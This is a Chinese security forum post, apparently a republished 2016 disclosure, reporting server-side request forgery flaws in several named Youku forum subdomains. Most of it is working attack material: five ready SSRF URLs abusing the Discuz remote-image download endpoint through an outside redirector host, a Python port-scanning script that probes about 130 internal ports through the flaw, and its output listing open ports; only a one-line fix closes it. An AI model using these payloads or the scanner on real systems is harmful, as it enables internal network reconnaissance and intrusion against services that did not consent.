HanDs
管理员

[7月漏洞公开] 优酷多个分站存在SSRF漏洞大礼包 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

RT

详细说明:

具体危害请看前面的例子



code 区域
http://bbs.yj.youku.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]





code 区域
http://club.youku.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg[/img]





code 区域
http://bbs.youkutv.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=80%26data=helo.jpg[/img]







code 区域
http://bbs.share.youku.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg[/img]





code 区域
http://bbs.wan.youku.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=80%26data=helo.jpg[/img]

漏洞证明:

随便找个站扫下端口:

code 区域
#!/usr/bin/env python

# -*- coding: utf-8 -*-

# @Author: Lcy

# @Date: 2016-07-05 20:55:30

# @Last Modified by: Lcy

# @Last Modified time: 2016-07-11 09:28:01

import requests
import threading
import Queue
import time

threads_count = 1
que = Queue.Queue()
lock = threading.Lock()
threads = []
ports = [21,22,23,25,69,80,81,82,83,84,110,389,389,443,445,488,512,513,514,873,901,1043,1080,1099,1090,1158,1352,1433,1434,1521,2049,2100,2181,2601,2604,3128,3306,3307,3389,4440,4444,4445,4848,5000,5280,5432,5500,5632,5900,5901,5902,5903,5984,6000,6033,6082,6379,6666,7001,7001,7002,7070,7101,7676,7777,7899,7988,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8069,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8098,8099,8980,8990,8443,8686,8787,8880,8888,9000,9001,9043,9045,9060,9080,9081,9088,9088,9090,9091,9100,9200,9300,9443,9871,9999,10000,10068,10086,11211,20000,22022,22222,27017,28017,50060,50070]
for i in ports:
que.put(str(i))
def run():
while que.qsize() > 0:
p = que.get()
try:
url = "http://bbs.yj.youku.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip=127.0.0.1%26port={port}%26data=helo.jpg[/img]".format(
port=p)
time.sleep(0.3)
r = requests.get(url,timeout=1.8)
except:
lock.acquire()
print "{port} Open".format(port=p)
lock.release()
for i in range(threads_count):
t = threading.Thread(target=run)
threads.append(t)
t.setDaemon(True)
t.start()

while que.qsize() > 0:
time.sleep(1.0)





code 区域
80  Open
9000 Open
11211 Open
22022 Open

修复方案:

禁止对内网资源访问,取外网资源的API部署在不属于自己的机房


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
多个 分站 存在 S SR F 漏洞 大礼包
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复